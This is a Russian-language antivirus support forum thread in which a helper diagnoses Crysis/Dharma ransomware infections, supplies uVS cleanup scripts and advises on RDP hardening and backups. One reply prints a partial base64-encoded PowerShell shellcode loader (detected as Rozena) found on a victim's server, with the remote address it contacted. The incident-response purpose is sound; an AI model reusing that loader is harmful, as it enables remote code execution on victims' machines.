файлы зашифрованы с расширением .betta; .vanss; .like; .gdb; .xxxxx; .adobe; .tron; .AUDIT; .cccmn; .back; .Bear; .fire; .myjob; .war; .risk; .bkpx;.santa; .bizer , Filecoder.Crysis / Encoder.3953; r/n: info.hta

RSS

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 26.11.2018 09:09:55

на текущий момент известные варианты CrySis/Dharma, которые не могут быть расшифрованы в вирлабе:

Цитата
.cesar; .arena; .cobra; .java; .write; .arrow; .bip; .cmb/.combo; .brrr; .gamma; .monro; .bkp; .btc; .bgtx; .boost; .waifu; .FUNNY; .betta; .vanss; .like; .gdb; .xxxxx; .adobe; .tron; .AUDIT; .cccmn; .back; .Bear; .fire; .myjob; .war; .risk; .bkpx; .santa; .bizer

теперь, когда вас шифрануло Crysis, примите серьезные меры безопасности:

1. создание бэкапов данных на отдельном устройстве, которое не должно быть постоянно доступным;
2. установка актуальных обновлений для операционной системы;
3. установка надежной актуальной антивирусной защиты с регулярным обновлением антивирусных баз;
4. установка надежных паролей для аккаунтов из группы RDP;
5. настройка нестандартного порта (вместо стандартного 3389) для сервиса RDP;
6. настройки безопасности, которые защищают пароль к аккаунту от удаленного брутфорсинга
7. если есть такая возможность, настройте двухфакторную аутентификацию для доступа к рабочему столу
8. доступ к рабочему столу из внешней сети (если необходим для работы), либо через VPN подключение, либо только с доверенных IP (белый лист);

[ Как создать образ автозапуска? ]

Ответы

Пред. 1 2 3 4 5 ... 8 След.

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 27.11.2018 08:08:59

@Сергей Зубков,

1. предполагаю, чтоб была взломана учетная запись USERS\BOCHARNIKOVA
именно из ее профиля был запуск шифратора.

%SystemDrive%\USERS\BOCHARNIKOVA\MUSIC\1\1ST.EXE

Цитата
Полное имя C:\USERS\BOCHARNIKOVA\MUSIC\1\1ST.EXE Имя файла 1ST.EXE Тек. статус ВИРУС [Запускался неявно или вручную] Обнаруженные сигнатуры Сигнатура Win32/Filecoder.Crysis.L (delall) [глубина совпадения 64(64), необх. минимум 8, максимум 64] 2017-08-18 Сохраненная информация на момент создания образа Статус [Запускался неявно или вручную] File_Id 58B8AF7219000 Linker 10.0 Размер 94720 байт Создан 27.11.2018 в 01:48:19 Изменен 10.11.2018 в 06:01:28

Цитата

Полное имя C:\USERS\BOCHARNIKOVA\MUSIC\1\1ST.EXE
Имя файла 1ST.EXE
Тек. статус ВИРУС [Запускался неявно или вручную]

Обнаруженные сигнатуры
Сигнатура Win32/Filecoder.Crysis.L (delall) [глубина совпадения 64(64), необх. минимум 8, максимум 64] 2017-08-18

Сохраненная информация на момент создания образа
Статус [Запускался неявно или вручную]
File_Id 58B8AF7219000
Linker 10.0
Размер 94720 байт
Создан 27.11.2018 в 01:48:19
Изменен 10.11.2018 в 06:01:28

в настоящее время активности шифратора нет.

2. по очистке системы выполните:
выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"

Код
;uVS v4.1.1 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c OFFSGNSAVE del %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-306DABD1.[[email protected]].ADOBE del %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-306DABD1.[[email protected]].ADOBE del %SystemDrive%\USERS\BOCHARNIKOVA\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-306DABD1.[[email protected]].ADOBE delref %SystemDrive%\USERS\BOCHARNIKOVA\APPDATA\ROAMING\INFO.HTA delref %Sys32%\INFO.HTA del %SystemDrive%\USERS\BOCHARNIKOVA\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\INFO.HTA.TXT delall %SystemDrive%\USERS\BOCHARNIKOVA\MUSIC\1\1ST.EXE delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\1ST.EXE apply QUIT

Код


;uVS v4.1.1 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
del %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-306DABD1.[[email protected]].ADOBE
del %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-306DABD1.[[email protected]].ADOBE
del %SystemDrive%\USERS\BOCHARNIKOVA\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-306DABD1.[[email protected]].ADOBE
delref %SystemDrive%\USERS\BOCHARNIKOVA\APPDATA\ROAMING\INFO.HTA
delref %Sys32%\INFO.HTA
del %SystemDrive%\USERS\BOCHARNIKOVA\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\INFO.HTA.TXT
delall %SystemDrive%\USERS\BOCHARNIKOVA\MUSIC\1\1ST.EXE
delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\1ST.EXE
apply

QUIT

без перезагрузки, пишем о старых и новых проблемах.
------------

3. по расшифровке файлов при наличие лицензии на продукты ESET сделайте запрос в [email protected]
(хотя расшифровки по crysis.adobe на текущий момент нет)

4. важные зашифрованные документы, сохраните на отдельный носитель, возможно расшифровка станет доступной в будущем.

5. ограничьте доступ к серверу по RDP из внешней сети, сделайте настройки по ограничению попыток неправильного ввода паролей, чтобы блокировать потенциальных взломщиков учетных записей.
если сервер в вашей локальной сети, желательно настроить доступ из внешней сети к рабочим серверам через VPN подключение.
(вобщем здесь много работы для сист. админа, как защитить локальную сеть от внешних вторжений.)

6. версия антивирусной защиты 4.2.40.10 крайне устарела, скорее всего уже и нет поддержки по данной версии.

Цитата
ESET NOD32 Antivirus Business Edition Version Release Date Latest build Updated Status Next Status Expected EOL 4 2-Mar-09 4.2.76.0 12-Jan-12 Basic Support End of Life Dec 2018* ESET Smart Security Business Edition Version Release Date Latest build Updated Status Next Status Expected EOL 4 2-Mar-09 4.2.76.0 12-Jan-12 Basic Support End of Life Dec 2018*

Есть специализированные продукты ESET для серверов: ESET File Security v6 и v7
переустановите антивирусный клиент на актуальную и специализированную версию.

7. поправил скрипт.

[ Как создать образ автозапуска? ]

Сообщений: 3

Баллов: 1

Регистрация: 27.11.2018

Размещено 27.11.2018 08:37:23

Спасибо

Сообщений: 3

Баллов: 1

Регистрация: 03.12.2018

Размещено 03.12.2018 10:48:21

Здравствуйте!
На Windows Server 2012 поймали шифровальщика в adobe ([email protected])

Зашифрованные файлы
Образ автозапуска

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 03.12.2018 12:26:43

Цитата
Aleksandr Gordichuk написал: Здравствуйте! На Windows Server 2012 поймали шифровальщика в adobe ( [email protected] ) Зашифрованные файлы Образ автозапуска

по очистке системы выполните скрипт:

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"

Код
;uVS v4.1.2 [http://dsrt.dyndns.org] ;Target OS: NTv6.3 v400c OFFSGNSAVE zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\INFO.HTA ;------------------------autoscript--------------------------- del %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE del %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE delall %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\INFO.HTA delall %Sys32%\INFO.HTA zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\EX.EXE addsgn A7679B1BB9DA4D720B132BD59A37ED05258AFC31CC061F7885C302F9A8D6714C237F43573E55F549CBC084F77AB749FA155F083255B230CC6D774CEEA8F9DDF0 8 Win32/Filecoder.Crysis.L 7 zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\EX.EXE zoo %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\EX.EXE zoo %Sys32%\EX.EXE chklst delvir delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DEFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ%26INSTALLSOURCE%3DONDEMAND%26UC delref %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE apply deltmp czoo ;------------------------------------------------------------- QUIT

Код


;uVS v4.1.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\INFO.HTA
;------------------------autoscript---------------------------

del %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE
del %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE
delall %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\INFO.HTA
delall %Sys32%\INFO.HTA
zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\EX.EXE
addsgn A7679B1BB9DA4D720B132BD59A37ED05258AFC31CC061F7885C302F9A8D6714C237F43573E55F549CBC084F77AB749FA155F083255B230CC6D774CEEA8F9DDF0 8 Win32/Filecoder.Crysis.L 7

zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\EX.EXE
zoo %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\EX.EXE
zoo %Sys32%\EX.EXE
chklst
delvir

delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DEFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ%26INSTALLSOURCE%3DONDEMAND%26UC
delref %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE
apply

deltmp
czoo
;-------------------------------------------------------------

QUIT

без перезагрузки, пишем о старых и новых проблемах.
------------
....
3. по расшифровке файлов при наличие лицензии на продукты ESET сделайте запрос в [email protected]
(хотя расшифровки по crysis.adobe на текущий момент нет)

4. важные зашифрованные документы, сохраните на отдельный носитель, возможно расшифровка станет доступной в будущем.

5. ограничьте доступ к серверу по RDP из внешней сети, сделайте настройки по ограничению попыток неправильного ввода паролей, чтобы блокировать потенциальных взломщиков учетных записей.
если сервер в вашей локальной сети, желательно настроить доступ из внешней сети к рабочим серверам через VPN подключение.

6. обратите внимание на сетевую активность powershell
83.171.107.131:49157 <-> 185.224.249.30:9425
при этом выполняется закодированный в base64 скрипт.

Код
JABTAHQASQBwACAAPQAgACcAJABJAHAAYgBBACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEkAcABiAEEAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGQAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBkACwAMAB4AGIAOAAsADAAeAA2ADQALAAwAHgANwBiACwAMAB4ADAAOAAsADAAeAA4ADAALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADgAMwAsADAAeABlAGQALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA0ADUALAAwAHgAMQA0ACwAMAB4ADAAMwAsADAAeAA0ADUALAAwAHgANwAwACwAMAB4ADkAOQAsADAAeABmAGQALAAwAHgANwBjACwAMAB4ADkAMAAsADAAeABkAGYALAAwAHgAZgBlACwAMAB4ADcAYwAsADAAeAA2ADAALAAwAHgAOAAwACwAMAB4ADcANwAsADAAeAA5ADkALAAwAH

Код

JABTAHQASQBwACAAPQAgACcAJABJAHAAYgBBACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEkAcABiAEEAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGQAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBkACwAMAB4AGIAOAAsADAAeAA2ADQALAAwAHgANwBiACwAMAB4ADAAOAAsADAAeAA4ADAALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADgAMwAsADAAeABlAGQALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA0ADUALAAwAHgAMQA0ACwAMAB4ADAAMwAsADAAeAA0ADUALAAwAHgANwAwACwAMAB4ADkAOQAsADAAeABmAGQALAAwAHgANwBjACwAMAB4ADkAMAAsADAAeABkAGYALAAwAHgAZgBlACwAMAB4ADcAYwAsADAAeAA2ADAALAAwAHgAOAAwACwAMAB4ADcANwAsADAAeAA5ADkALAAwAH

а так же обнаружен внедренный поток.

(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE [1828], tid=1972

[ Как создать образ автозапуска? ]

Сообщений: 3

Баллов: 1

Регистрация: 03.12.2018

Размещено 03.12.2018 14:46:37

По поводу очистки системы, это мы удаляем сам вирус?
и пункт 6, можете пояснить, я не понял

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 03.12.2018 16:19:05

Цитата
Aleksandr Lebowski написал: По поводу очистки системы, это мы удаляем сам вирус? и пункт 6, можете пояснить, я не понял

да, судя по образу в системе был активен файл шифратора. в процессах:

Цитата
; Процессы

?ВИРУС? (A)| C:\PROGRAM FILES (X86)\TEAMVIEWER\TEAMVIEWER.EXE
?ВИРУС? (A)| C:\PROGRAM FILES (X86)\TEAMVIEWER\TEAMVIEWER_SERVICE.EXE
Win32/Filecoder.Crysis.L(64)| C:\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\EX.EXE
АКТИВЕН | C:\PROGRAM FILES (X86)\RAID WEB CONSOLE 2\FRAMEWORK\VIVALDIFRAMEWORK.EXE

без очистки системы, новые файлы будут опять зашифрованы.

по п.6 powershell установил подключение с адресом:
NetRange: 185.0.0.0 - 185.255.255.255
City: Amsterdam
Country: NL

и выполняет закодированный скрипт. который кстати, детектируется антивирусом как
PowerShell/Rozena.AF троянская программа
----------
возможно, скрипт работает на майнинг.
после очистки системы скриптом uVS необходимо выполнить сканирование системы штатным антивирусом если не планируете восстановить систему до безопасной точки восстановления, или переустановить систему.

если антивирусная защита не установлена, необходимо установить антивирусный продукт. например. ESET File Security v 6 или 7

[ Как создать образ автозапуска? ]

Сообщений: 3

Баллов: 1

Регистрация: 03.12.2018

Размещено 03.12.2018 16:44:15

Спасибо за ответ )
наверное полностью все сносить будем
жаль что файлы не расшифровать

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 03.12.2018 16:50:59

Цитата
Aleksandr Lebowski написал: Спасибо за ответ ) наверное полностью все сносить будем жаль что файлы не расшифровать

да, сейчас не расшифровать.
на этот пункт обратите внимание.

Цитата
5. ограничьте доступ к серверу по RDP из внешней сети, сделайте настройки по ограничению попыток неправильного ввода паролей, чтобы блокировать потенциальных взломщиков учетных записей. если сервер в вашей локальной сети, желательно настроить доступ из внешней сети к рабочим серверам через VPN подключение.

Цитата

5. ограничьте доступ к серверу по RDP из внешней сети, сделайте настройки по ограничению попыток неправильного ввода паролей, чтобы блокировать потенциальных взломщиков учетных записей.
если сервер в вашей локальной сети, желательно настроить доступ из внешней сети к рабочим серверам через VPN подключение.

скорее всего был подобран пароль к какой либо учетной записи.

[ Как создать образ автозапуска? ]

Сообщений: 1

Регистрация: 26.11.2018

Размещено 04.12.2018 12:23:06

здравствуйте, вирус проник в базу 1с, в результате файлы стали .adobe

https://www.sendspace.com/file/j4r09c

Сообщений: 17962

Баллов: 14369

Регистрация: 16.03.2010

Размещено 04.12.2018 13:00:16

Цитата
Роман Фадеев написал: здравствуйте, вирус проник в базу 1с, в результате файлы стали .adobe https://www.sendspace.com/file/j4r09c

@Роман Фадеев,

судя по образу автозапуска система уже очищена от вредоносных файлов шифратора.

по расшифровки .adobe, к сожалению, не сможем вам помочь, восстановление документов на текущий момент возможно,
только из архивных копий документов. (о которых не следует забывать в связи активностью шифраторов, и прочих катастроф)

в любом случае:

3. по расшифровке файлов при наличие лицензии на продукты ESET сделайте запрос в [email protected]
(хотя расшифровки по crysis.adobe на текущий момент нет)

4. важные зашифрованные документы, сохраните на отдельный носитель, возможно расшифровка станет доступной в будущем.

на будущее:
5. ограничьте доступ к серверу по RDP из внешней сети, сделайте настройки по ограничению попыток неправильного ввода паролей, чтобы блокировать потенциальных взломщиков учетных записей.
если сервер в вашей локальной сети, желательно настроить доступ из внешней сети к рабочим серверам через VPN подключение.
--------
злоумышленники, которые распространяют Crysis, как правило используют возможности получения доступа к RDP, путем взлома учетных записей на сервере.

[ Как создать образ автозапуска? ]

Пред. 1 2 3 4 5 ... 8 След.